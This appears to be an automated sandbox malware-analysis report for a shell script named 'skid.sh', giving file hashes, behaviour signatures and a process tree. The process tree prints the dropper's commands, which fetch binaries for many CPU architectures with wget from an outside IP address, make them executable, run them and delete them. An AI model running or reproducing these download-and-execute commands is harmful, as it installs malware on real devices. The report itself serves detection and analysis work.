Analysis
-
max time kernel
146s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
26/02/2025, 16:58
Static task
static1
Behavioral task
behavioral1
Sample
skid.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
skid.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
skid.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
skid.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
skid.sh
-
Size
1KB
-
MD5
b748ad8311eb181303f9c59d1efd764f
-
SHA1
e3da904334e7ed388ef2ccca048c7a0e50e4332b
-
SHA256
32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf
-
SHA512
b34853c0dac00b278c10e3019751634603099ce87125824a278e90d978560449ffc34c6af404134928be3d413979934d61aa5003fe1f826f980c2908449c7da5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 762 chmod 767 chmod 775 chmod 726 chmod 736 chmod 747 chmod 752 chmod 757 chmod -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route skid.mpsl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route skid.mpsl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 710 wget 727 skid.mips 731 rm -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/skid.mpsl wget File opened for modification /tmp/skid.x86 wget File opened for modification /tmp/skid.ppc wget File opened for modification /tmp/skid.sparc wget File opened for modification /tmp/skid.arm4 wget File opened for modification /tmp/skid.arm5 wget File opened for modification /tmp/skid.arm6 wget File opened for modification /tmp/skid.mips wget
Processes
-
/tmp/skid.sh/tmp/skid.sh1⤵PID:707
-
/usr/bin/wgetwget http://185.224.0.18/skid.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:710
-
-
/bin/chmodchmod +x skid.mips2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/skid.mips./skid.mips2⤵
- System Network Configuration Discovery
PID:727
-
-
/bin/rmrm -rf skid.mips2⤵
- System Network Configuration Discovery
PID:731
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.mpsl2⤵
- Writes file to tmp directory
PID:733
-
-
/bin/chmodchmod +x skid.mpsl2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/skid.mpsl./skid.mpsl2⤵
- Reads system routing table
- Reads system network configuration
PID:738
-
-
/bin/rmrm -rf skid.mpsl2⤵PID:741
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.x862⤵
- Writes file to tmp directory
PID:743
-
-
/bin/chmodchmod +x skid.x862⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/skid.x86./skid.x862⤵PID:748
-
-
/bin/rmrm -rf skid.x862⤵PID:750
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.ppc2⤵
- Writes file to tmp directory
PID:751
-
-
/bin/chmodchmod +x skid.ppc2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/skid.ppc./skid.ppc2⤵PID:753
-
-
/bin/rmrm -rf skid.ppc2⤵PID:755
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.sparc2⤵
- Writes file to tmp directory
PID:756
-
-
/bin/chmodchmod +x skid.sparc2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/skid.sparc./skid.sparc2⤵PID:758
-
-
/bin/rmrm -rf skid.sparc2⤵PID:760
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.arm42⤵
- Writes file to tmp directory
PID:761
-
-
/bin/chmodchmod +x skid.arm42⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/skid.arm4./skid.arm42⤵PID:763
-
-
/bin/rmrm -rf skid.arm42⤵PID:765
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.arm52⤵
- Writes file to tmp directory
PID:766
-
-
/bin/chmodchmod +x skid.arm52⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/skid.arm5./skid.arm52⤵PID:768
-
-
/bin/rmrm -rf skid.arm52⤵PID:770
-
-
/usr/bin/wgetwget http://185.224.0.18/skid.arm62⤵
- Writes file to tmp directory
PID:771
-
-
/bin/chmodchmod +x skid.arm62⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/skid.arm6./skid.arm62⤵PID:776
-
-
/bin/rmrm -rf skid.arm62⤵PID:779
-